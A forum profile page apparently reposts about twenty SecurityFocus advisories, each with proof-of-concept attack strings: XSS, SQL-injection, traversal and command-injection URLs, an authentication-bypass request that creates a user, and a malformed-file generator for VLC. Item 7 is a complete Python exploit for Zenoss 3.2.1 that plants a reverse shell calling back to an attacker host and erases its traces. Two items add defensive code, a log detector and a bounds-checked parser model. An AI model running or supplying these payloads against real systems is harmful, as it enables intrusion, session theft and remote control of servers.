HireHackking

Everything posted by HireHackking

  1. source: https://www.securityfocus.com/bid/54727/info

Scrutinizer is prone to an authentication-bypass vulnerability. Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions. Scrutinizer 9.5.0 is vulnerable; other versions may also be affected.

#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: 10.70.70.212
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70

tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1

#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8

{"new_user_id":"2"}
  2. source: https://www.securityfocus.com/bid/54733/info

DataWatch Monarch Business Intelligence is prone to multiple input validation vulnerabilities. Successful exploits will allow an attacker to manipulate the XPath query logic to carry out unauthorized actions on the XML documents of the application. It will also allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. DataWatch Monarch Business Intelligence 5.1 is vulnerable; other versions may also be affected.

http://www.example.com/ESAdmin/jsp/tabview.jsp?mode=add</script><script>alert(1)</script>&type=2&renew=1&pageid=PAGE_MPROCESS
http://www.example.com/ESClient/jsp/customizedialog.jsp?templateType=-1&doctypeid=122&activetab=DM_DOCUMENT_LIST&fields=filter;sort;summary;&searchtype=document'&doclist.jsp
  3. source: https://www.securityfocus.com/bid/54786/info tekno.Portal is prone to an SQL-injection vulnerability. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. tekno.Portal 0.1b is vulnerable; other versions may also be affected. http://www.example.com/teknoportal/link.php?kat=[Blind SQL Injection]
  4. source: https://www.securityfocus.com/bid/54793/info

Zenoss is prone to the following security vulnerabilities:

1. Multiple arbitrary command-execution vulnerabilities
2. Multiple HTML-injection vulnerabilities
3. An open-redirection vulnerability
4. Multiple directory-traversal vulnerabilities
5. Multiple information-disclosure vulnerabilities
6. A code-execution vulnerability

An attacker can exploit these issues to retrieve arbitrary files, redirect a user to a potentially malicious site, execute arbitrary commands, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials to perform unauthorized actions in the context of a user's session, or disclose sensitive information. Zenoss 3.2.1 and prior are vulnerable.

http://www.example.com/zport/About/showDaemonXMLConfig?daemon=uname%20-a%26
http://www.example.com/zport/dmd/Events/Users/@@eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence=&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/Events/Users/eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence=&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/Events/Status/Snmp/@@eventClassStatus?tableName=eventinstances&sortedHeader=primarySortKey&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/ZenEventManager/listEventCommands?tableName=eventCommands&sortedHeader=primarySortKey&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script><"
http://www.example.com/zport/dmd/backupInfo?tableName=backupTable&sortedHeader=fileName&sortRule=cmp&sortedSence="><script>alert(document.cookie)</script>
http://www.example.com/zport/acl_users/cookieAuthHelper/login?came_from=http%3a//example%2ecom/%3f
http://www.example.com/zport/About/viewDaemonLog?daemon=../../../var/log/mysqld
http://www.example.com/zport/About/viewDaemonConfig?daemon=../../../../etc/syslog
http://www.example.com/zport/About/editDaemonConfig?daemon=../../../../etc/syslog
http://www.example.com/zport/RenderServer/plugin?name=../../../../../../tmp/arbitrary-python-file
http://www.example.com/zport/dmd/ZenEventManager
http://www.example.com/manage
  5. source: https://www.securityfocus.com/bid/54791/info

VLC Media Player is prone to a denial-of-service vulnerability. Successful exploits may allow attackers to crash the affected application, denying service to legitimate users. VLC Media Player 2.0.2 is vulnerable; other versions may also be affected.

#!/usr/bin/perl
# Writes a malformed .3gp file: a MIDI "MThd" chunk header, followed by an
# "ftyp3gp" box whose size byte is left as the original PoC's "\xnn" placeholder
# (Perl turns "\x" with no hex digits into a NUL byte and keeps the "nn" literally).
my $a = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
my $b = "\x00\x00\x00\xnn\x66\x74\x79\x70\x33\x67\x70";
my $c = "\x62\x6\x74\x77\x65\x65\x6e\x20\x74\x68\x65\x20\x68\x65\x61\x64\x65\x72\x20\x61\x6e\x64\x20\x74\x68\x65\x20\x66\x6f\x6f\x74\x65\x72\x20\x74\x68\x65\x72\x65\x27\x73\x20\x64\x61\x72\x6b\x2d\x70\x75\x7a\x7a\x6c\x65";
my $d = "\x33\x67\x70";
my $file = "darkpuzzle.3gp";
open(my $File, '>', $file) or die "Cannot write $file: $!";
binmode($File);   # raw bytes, no newline translation on Windows
print $File $a, $b, $c, $d;
close($File);
  6. source: https://www.securityfocus.com/bid/54792/info ntop is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. ntop 4.0.3 is vulnerable; other versions may also be affected. http://www.example.com/plugins/rrdPlugin?action=arbreq&which=graph&arbfile=TEST">[XSS]&arbiface=eth0&start=1343344529&end=1343348129&counter=&title=Active+End+Nodes&mode=zoom
  7. source: https://www.securityfocus.com/bid/54793/info

Same Zenoss advisory as item 4 above (Zenoss 3.2.1 and prior are vulnerable); this post carries the post-authentication command-execution exploit.

# Zenoss <= 3.2.1 Remote Post-Authentication Command Execution
#################
# o Requires: Credentials for a user with "ZenManager" or "Manager" roles.
# o Tested: Zenoss 3.2.1
# o Default port: 8080
# Brendan Coles <bcoles at gmail dot com>
# 2012-03-14
################################################################################
# Python 2 script. Flow: log in with the supplied credentials, create an empty
# Zenoss "event command", edit it so its command line drops and runs a Python
# reverse shell from /tmp, raise a matching event to trigger it, then clean up.
import socket, sys, random, time, re

#verbose = True
verbose = False

# usage (script name plus six arguments)
if len(sys.argv) < 7:
    print "Zenoss <= 3.2.1 Remote Post-Authentication Command Execution"
    print "[*] Usage: python "+sys.argv[0]+" <RHOST> <RPORT> <username> <password> <LHOST> <LPORT>"
    print "[*] Example: python "+sys.argv[0]+" 192.168.1.10 8080 zenoss zenoss 192.168.1.1 4444"
    sys.exit(0)

# zenoss details
RHOST = sys.argv[1]
RPORT = int(sys.argv[2])
username = sys.argv[3]
password = sys.argv[4]

# reverse shell
LHOST = sys.argv[5]
LPORT = int(sys.argv[6])

# random file name
filename = ""
for i in range(0,random.randint(10,20)):
    filename = filename+chr(random.randint(97,122))

# connect to RHOST:RPORT
try:
    socket.inet_aton(RHOST)
except socket.error:
    print "[-] Error: Could not create socket."
    sys.exit(1)
try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((RHOST,RPORT))
except:
    print "[-] Error: Could not connect to server"
    sys.exit(1)

# Login and get cookie
if verbose: print "[*] Logging in"
request = "GET /zport/acl_users/cookieAuthHelper/login?__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\n\r\n"
try:
    # send request
    s.sendto(request, (RHOST, RPORT))
    data = s.recv(1024)
    if verbose: print str(data)+"\r\n"
    # get ginger cookie
    m = re.search('(__ginger_snap=".+";)', data)
    if not m:
        raise Exception("[-] Error: Could not retrieve __ginger_snap cookie value")
    else:
        ginger_cookie = str(m.group(1))
except:
    print "[-] Error: Login failed"
    sys.exit(1)

# Add empty command to web interface
if verbose: print "[*] Adding command to Zenoss"
request = "GET /zport/dmd/ZenEventManager/commands/?id="+filename+"&manage_addCommand%3Amethod=+Add+&__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\n\r\n"
try:
    # send request
    s.sendto(request, (RHOST, RPORT))
    data = s.recv(1024)
    if verbose: print str(data)+"\r\n"
    m = re.search('(Bobo-Exception-Type: Unauthorized)', data)
    if m:
        raise Exception("[-] Error: Incorrect username/password")
    else:
        print "[+] Added command to Zenoss successfully"
except:
    print "[-] Error: Adding command to Zenoss failed"
    sys.exit(1)

# Wait for command to be saved
wait = 5
if verbose: print "[*] Waiting "+str(wait)+" seconds"
time.sleep(wait)

# Edit command to drop a python reverse shell request in /tmp/
if verbose: print "[*] Updating command with payload"
postdata = "zenScreenName=editEventCommand.pt&enabled%3Aboolean=True&defaultTimeout%3Aint=60&delay%3Aint=1&repeatTime%3Aint=15&command=echo+%22import+socket%2Csubprocess%2Cos%3Bhost%3D%5C%22"+LHOST+"%5C%22%3Bport%3D"+str(LPORT)+"%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28host%2Cport%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B+os.dup2%28s.fileno%28%29%2C1%29%3B+os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%5C%22%2Fbin%2Fsh%5C%22%2C%5C%22-i%5C%22%5D%29%3B%22+%3E+%2Ftmp%2F"+filename+".py%20%26%26%20chmod%20%2bx%20%2Ftmp%2F"+filename+".py%20%26%26%20python%20%2Ftmp%2F"+filename+".py&clearCommand=&add_filter=&manage_editEventCommand%3Amethod=+Save+"
request = "POST /zport/dmd/ZenEventManager/commands/"+filename+"?__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(postdata))+"\r\n\r\n"+postdata
try:
    # send request
    s.sendto(request, (RHOST, RPORT))
    data = s.recv(1024)
    if verbose: print str(data)+"\r\n"
    # get zope cookie
    m = re.search('(_ZopeId=".+";)', data)
    if not m:
        raise Exception("[-] Error: Could not retrieve _ZopeId cookie value")
    else:
        zope_cookie = str(m.group(1))
        print "[+] Sent payload successfully"
except:
    print "[-] Error: Sending payload failed"
    sys.exit(1)

# Wait for command to be saved
wait = 5
if verbose: print "[*] Waiting "+str(wait)+" seconds"
time.sleep(wait)

# Send trigger event and get event id
if verbose: print "[*] Sending trigger event"
postdata = '{"action":"EventsRouter","method":"add_event","data":[{"summary":"'+filename+'","device":"'+filename+'","component":"'+filename+'","severity":"Info","evclasskey":"","evclass":""}],"type":"rpc","tid":0}'
request = "POST /zport/dmd/Events/evconsole_router HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+'\r\nX-Requested-With: XMLHttpRequest\r\nCookie: '+ginger_cookie+' '+zope_cookie+'\r\nContent-Type: application/json; charset=UTF-8\r\nContent-Length: '+str(len(postdata))+'\r\n\r\n'+postdata
try:
    # send request
    s.sendto(request, (RHOST, RPORT))
    data = s.recv(1024)
    if verbose: print str(data)+"\r\n"
    # get trigger event id "evid"
    m = re.search('"evid": "(.+)"', data)
    evid = ""
    if not m:
        raise Exception("[-] Error: Sending trigger event failed")
    else:
        evid = str(m.group(1))
        print "[+] Sent trigger event successfully"
except:
    print "[-] Error: Sending trigger event failed"

# Wait for command to execute
wait = 60
if verbose: print "[*] Waiting "+str(wait)+" seconds"
time.sleep(wait)

# Delete trigger from web interface
if verbose: print "[*] Deleting the trigger"
postdata = '{"action":"EventsRouter","method":"close","data":[{"evids":["'+evid+'"],"excludeIds":{},"selectState":null,"field":"component","direction":"ASC","params":"{\\"severity\\":[5,4,3,2],\\"eventState\\":[0,1]}","asof":0}],"type":"rpc","tid":0}'
request = "POST /zport/dmd/Events/evconsole_router HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+'\r\nX-Requested-With: XMLHttpRequest\r\nCookie: '+ginger_cookie+' '+zope_cookie+'\r\nContent-Type: application/json; charset=UTF-8\r\nContent-Length: '+str(len(postdata))+'\r\n\r\n'+postdata
try:
    # send request
    s.sendto(request, (RHOST, RPORT))
    data = s.recv(1024)
    if verbose: print str(data)+"\r\n"
    print "[+] Deleted trigger successfully"
except:
    print "[-] Error: Deleting trigger failed"

# Delete command from web interface
if verbose: print "[*] Deleting the command from Zenoss"
request = "GET /zport/dmd/ZenEventManager?zenScreenName=listEventCommands&redirect=false&ids%3Alist="+filename+"&id=&manage_deleteCommands%3Amethod=Delete&__ac_name="+username+"&__ac_password="+password+" HTTP/1.1\r\nHost: "+RHOST+":"+str(RPORT)+"\r\n\r\n"
try:
    s.sendto(request, (RHOST, RPORT))
    data = s.recv(1024)
    if verbose: print str(data)+"\r\n"
    print "[+] Deleted command from Zenoss successfully"
except:
    print "[-] Error: Deleting command failed"

print "[+] You should now have a reverse shell at "+LHOST+":"+str(LPORT)
print "[+] Don't forget to delete /tmp/"+filename+".py"
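Both Zenoss posts (the advisory URLs in item 4 and the exploit above) leave a footprint in the web server's access log: the exploit logs in and creates/deletes its event command with `__ac_name`/`__ac_password` in the query string, and the command-injection, traversal and open-redirect URLs carry their payloads in GET parameters. The following is an added detection example, not part of either post or of Zenoss; it assumes the request line is logged in Apache combined format (Zope's Z2.log is close to it) and runs over constructed sample lines. The reverse-shell payload itself travels in a POST body and is not visible here, so the command-creation and credential-in-URL events are what an analyst gets to pivot on.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/Zope combined-style access-log line: client, timestamp, request line, status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# Zope form methods that create, edit or delete Zenoss "event commands" (shell commands Zenoss
# runs when an event matches). They arrive as query keys such as "manage_addCommand:method";
# the part before the colon is what we match.
COMMAND_METHODS = {
    "manage_addCommand": "event command created",
    "manage_editEventCommand": "event command edited",
    "manage_deleteCommands": "event command deleted",
}
SAFE_DAEMON_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")


def classify_request(url):
    """Return human-readable findings for one request URL (empty list if nothing suspicious)."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    findings = []

    # cookieAuthHelper accepts credentials as GET parameters, so they end up in access logs.
    if "__ac_password" in query:
        findings.append("credentials in query string")

    for key in query:
        method = key.split(":")[0]
        if method in COMMAND_METHODS:
            findings.append(COMMAND_METHODS[method])

    for key, values in query.items():
        for value in values:                     # parse_qs already percent-decoded the value
            if "../" in value:
                findings.append("path traversal in parameter %s" % key)
            elif "<" in value:
                findings.append("markup in parameter %s" % key)
            elif key == "daemon" and not SAFE_DAEMON_NAME.match(value):
                findings.append("shell metacharacters in daemon parameter")
            elif key == "came_from" and "://" in value:
                findings.append("external redirect target")
    return findings


def scan_log(lines):
    """Parse each access-log line and return the suspicious ones with their findings."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("url"))
        if findings:
            hits.append({"line": number, "ip": m.group("ip"), "method": m.group("method"),
                         "url": unquote(m.group("url")), "findings": findings})
    return hits


# Constructed sample log (not real traffic): the exploit's login, command creation, payload POST
# and cleanup, the command-injection/traversal/redirect URLs from item 4, and one benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Mar/2012:10:00:01 +0000] "GET /zport/acl_users/cookieAuthHelper/login?__ac_name=zenoss&__ac_password=zenoss HTTP/1.1" 302 0',
    '10.0.0.5 - - [14/Mar/2012:10:00:02 +0000] "GET /zport/dmd/ZenEventManager/commands/?id=qwlkjhgf&manage_addCommand%3Amethod=+Add+&__ac_name=zenoss&__ac_password=zenoss HTTP/1.1" 302 0',
    '10.0.0.5 - - [14/Mar/2012:10:00:07 +0000] "POST /zport/dmd/ZenEventManager/commands/qwlkjhgf?__ac_name=zenoss&__ac_password=zenoss HTTP/1.1" 200 2311',
    '10.0.0.7 - - [14/Mar/2012:10:00:09 +0000] "GET /zport/dmd/Devices HTTP/1.1" 200 18342',
    '203.0.113.9 - - [14/Mar/2012:10:01:15 +0000] "GET /zport/About/showDaemonXMLConfig?daemon=uname%20-a%26 HTTP/1.1" 200 1764',
    '203.0.113.9 - - [14/Mar/2012:10:01:20 +0000] "GET /zport/About/viewDaemonLog?daemon=../../../var/log/mysqld HTTP/1.1" 200 90214',
    '203.0.113.9 - - [14/Mar/2012:10:01:31 +0000] "GET /zport/acl_users/cookieAuthHelper/login?came_from=http%3a//example%2ecom/%3f HTTP/1.1" 302 0',
    '10.0.0.5 - - [14/Mar/2012:10:02:30 +0000] "GET /zport/dmd/ZenEventManager?zenScreenName=listEventCommands&redirect=false&ids%3Alist=qwlkjhgf&id=&manage_deleteCommands%3Amethod=Delete&__ac_name=zenoss&__ac_password=zenoss HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d %s %s %s -> %s" % (hit["line"], hit["ip"], hit["method"],
                                          hit["url"], "; ".join(hit["findings"])))
```

A command created and deleted by the same client a minute apart, bracketed by logins that put the password in the URL, is the sequence to alert on; the `daemon` parameter should never contain anything but a daemon name.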
  8. source: https://www.securityfocus.com/bid/54805/info Elefant CMS is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Elefant CMS 1.2.0 is vulnerable; other versions may also be affected. http://www.example.com/admin/versions?id=[XSS]&type=Webpage
  9. source: https://www.securityfocus.com/bid/54816/info

Calligra is prone to a remote buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. Calligra 2.4.3 and KOffice 2.3.3 are vulnerable; other versions may also be affected.

bool STD::read( U16 baseSize, U16 totalSize, OLEStreamReader* stream, bool preservePos )
...
    grupxLen = totalSize - ( stream->tell() - startOffset );
    grupx = new U8[ grupxLen ];
    int offset = 0;
    for ( U8 i = 0; i < cupx; ++i) {
        U16 cbUPX = stream->readU16();  // size of the next UPX
        stream->seek( -2, G_SEEK_CUR ); // rewind the "lookahead"
        cbUPX += 2;                     // ...and correct the size
        for ( U16 j = 0; j < cbUPX; ++j ) {
            grupx[ offset + j ] = stream->readU8(); // read the whole UPX
        }
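The snippet above sizes `grupx` from the style record's `totalSize`, but then copies each UPX according to the `cbUPX` length field read from the file, without checking that `offset + cbUPX + 2` still fits in `grupxLen`. A file whose UPX declares a large `cbUPX` therefore writes past the heap buffer. The following is an added Python model of that loop and of the missing check (not Calligra's code, and not its actual fix); the in-memory reader is a stand-in for `OLEStreamReader`, little-endian as in Word binaries, and both inputs are constructed here. In the unchecked version Python's bounds check on the `bytearray` raises `IndexError` exactly where the C++ code would corrupt the heap.

```python
import struct


class ByteReader:
    """Stand-in for OLEStreamReader over an in-memory buffer (little-endian integers)."""

    def __init__(self, data: bytes, pos: int = 0):
        self.data = data
        self.pos = pos

    def tell(self) -> int:
        return self.pos

    def seek_cur(self, delta: int) -> None:
        self.pos += delta

    def read_u8(self) -> int:
        if self.pos >= len(self.data):
            raise EOFError("stream exhausted")
        value = self.data[self.pos]
        self.pos += 1
        return value

    def read_u16(self) -> int:
        if self.pos + 2 > len(self.data):
            raise EOFError("stream exhausted")
        (value,) = struct.unpack_from("<H", self.data, self.pos)
        self.pos += 2
        return value


def read_grupx_unchecked(stream, cupx, grupx_len):
    """Mirror of the vulnerable loop: every UPX's self-declared size (cbUPX + 2) is copied
    into a grupx_len-byte buffer without checking that it fits. C++: heap overflow;
    here: IndexError from the bytearray."""
    grupx = bytearray(grupx_len)
    offset = 0
    for _ in range(cupx):
        cb_upx = stream.read_u16()   # size of the next UPX
        stream.seek_cur(-2)          # rewind the lookahead ...
        cb_upx += 2                  # ... and include the size field itself
        for j in range(cb_upx):
            grupx[offset + j] = stream.read_u8()
        offset += cb_upx
    return bytes(grupx)


def read_grupx(stream, cupx, grupx_len):
    """Hardened version: reject any UPX whose declared size does not fit in the remaining
    grupx space, and treat a truncated stream as an error as well. Returns the list of UPX
    records (each still prefixed with its 2-byte length) or None on malformed input."""
    grupx = bytearray(grupx_len)
    offset = 0
    records = []
    try:
        for _ in range(cupx):
            cb_upx = stream.read_u16()
            stream.seek_cur(-2)
            cb_upx += 2
            if cb_upx > grupx_len - offset:      # the check the original loop lacks
                return None
            for j in range(cb_upx):
                grupx[offset + j] = stream.read_u8()
            records.append(bytes(grupx[offset:offset + cb_upx]))
            offset += cb_upx
    except EOFError:
        return None
    return records


def overflows(data, cupx, grupx_len) -> bool:
    """True when the unchecked reader would write past the end of grupx for this input."""
    try:
        read_grupx_unchecked(ByteReader(data), cupx, grupx_len)
    except IndexError:
        return True
    return False


# Constructed inputs (not from a real document): two well-formed UPX records whose sizes add
# up to grupx_len, and a crafted record that declares cbUPX = 0xFFFF inside a 9-byte grupx.
WELL_FORMED = b"\x03\x00abc" + b"\x02\x00de"   # cupx = 2, grupx_len = 9
CRAFTED = b"\xff\xff" + b"A" * 64              # cupx = 1, grupx_len = 9

if __name__ == "__main__":
    print(read_grupx(ByteReader(WELL_FORMED), 2, 9))
    print(read_grupx(ByteReader(CRAFTED), 1, 9))
    print(overflows(CRAFTED, 1, 9))
```

The check has to be against the space remaining in `grupx` (`grupx_len - offset`), not just against `grupx_len`, since later records would otherwise still run past the end after earlier ones consumed the buffer.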
  10. source: https://www.securityfocus.com/bid/54814/info

The 'com_photo' module for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com.np/index.php?option=com_photo&task=gallery&AlbumId=8[SQL Injection]
http://www.example.com/index.php?option=com_photo&action=slideview&key=16[SQL Injection]
  11. source: https://www.securityfocus.com/bid/54817/info

PolarisCMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

http://www.example.com/reselleradmin/blog.aspx?%27%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.example.com/reselleradmin/blog.aspx?%27onmouseover=prompt(101)%3E
  12. source: https://www.securityfocus.com/bid/54812/info

Worksforweb iAuto is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Review: Add Comments - Listing

<div class="addComment">
<h1>Reply to The Comment</h1>
<div class="pageDescription">
<div class="commentInfo">You are replying to the comment #"><iframe src="iAuto%20%20%20Listing%20Comments%20Reply%20to%20The%20Comment-Dateien/[PERSISTENT INJECTED CODE!])' <="" to="" listing="" #448="" "<span="" class="fieldValue fieldValueYear" height="900" width="1000">2007</span>
<span class="fieldValue fieldValueMake">Acura</span>

1.2 The client-side cross-site scripting vulnerabilities can be exploited by remote attackers with medium or high required user interaction. For demonstration or reproduce ...

String: "><iframe src=http://vuln-lab.com width=1000 height=900 onload=alert("VulnerabilityLab") <

Dealer > Search Sellers > City
PoC: http://www.example.com/iAuto/m/users/search/?DealershipName[equal]=jamaikan-hope23&City[equal]=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3C&State[equal]=11&action=search

Browse by Make and Model / AC Cobra / >
PoC: http://www.example.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/

Comments > Reply to The Comment > Topic & Text (commentSid)
PoC: http://www.example.com/iAuto/m/comment/add/?listingSid=448&commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C&returnBackUri=%2Flisting%2Fcomments%2F448%2F%3F
  13. source: https://www.securityfocus.com/bid/54822/info Open Constructor is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Open Constructor 3.12.0 is vulnerable; other versions may also be affected. http://www.example.com/openconstructor/users/users.php?type=multiple&keyword=<script>alert('xss')</script>
  14. source: https://www.securityfocus.com/bid/54845/info

Dir2web is prone to multiple security vulnerabilities, including an SQL-injection vulnerability and an information-disclosure vulnerability. Successfully exploiting these issues allows remote attackers to compromise the software, retrieve information, modify data, disclose sensitive information, or gain unauthorized access; other attacks are also possible. Dir2web version 3.0 is vulnerable; other versions may also be affected.

http://www.example.com/index.php?wpid=homepage&oid=6a303a0aaa' OR id > 0-- -
  15. source: https://www.securityfocus.com/bid/54734/info

phpBB is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. phpBB 3.0.10 is vulnerable; other versions may also be affected.

Request :
---
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Connection: close

viewemail=1&massemail=1&allowpm=1&hideonline=0&notifypm=1&popuppm=0&lang=en&style=%2b1111111111&tz=0&dst=0&dateoptions=D+M+d%2C+Y+g%3Ai+a&dateformat=D+M+d%2C+Y+g%3Ai+a&submit=Submit&creation_time=1343370877&form_token=576...
  16. source: https://www.securityfocus.com/bid/54822/info Open Constructor is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Open Constructor 3.12.0 is vulnerable; other versions may also be affected. http://www.example.com/openconstructor/data/file/edit.php?result=<script>alert('xss')</script>&id=new&ds_id=8&hybridid=&fieldid=&callback=&type=txt&name=test&description=test&fname=test&create=Save
  17. source: https://www.securityfocus.com/bid/54822/info Open Constructor is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Open Constructor 3.12.0 is vulnerable; other versions may also be affected. http://www.example.com/openconstructor/confirm.php?q=<script>alert('XSS')</script>skin=metallic
  18. source: https://www.securityfocus.com/bid/54739/info JW Player is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Note: The vulnerability related to 'logo.link' parameter has been moved to BID 55199 for better documentation. http://www.example.com/player.swf?playerready=alert(document.cookie)
  19. source: https://www.securityfocus.com/bid/54757/info

Distimo Monitor is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Distimo Monitor 6.0 is vulnerable; other versions may also be affected.

https://www.example.com/downloads/date/metric:1/country:29/application:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/appstore:1
https://www.example.com/downloads/date/metric:1/country:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/application:99/appstore:1
https://www.example.com/downloads/map/metric:%3E%22%3Ciframe%20src=http://www.example1.com%3E+%3E%22%3Ciframe%20src=http://www.example1.com%3E
https://www.example.com/revenue/date/application:99/country:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com%3E
https://www.example.com/revenue/date/application:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com/country:30
  20. source: https://www.securityfocus.com/bid/54741/info eNdonesia is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. eNdonesia 8.5 is vulnerable; other versions may also be affected. http://www.example.com/eNdonesia/mod.php?mod=diskusi&op=viewcat&cid=-[id][SQL INJECTION]
  21. source: https://www.securityfocus.com/bid/54756/info

ManageEngine Applications Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. ManageEngine Applications Manager 10.0 is vulnerable; other versions may also be affected.

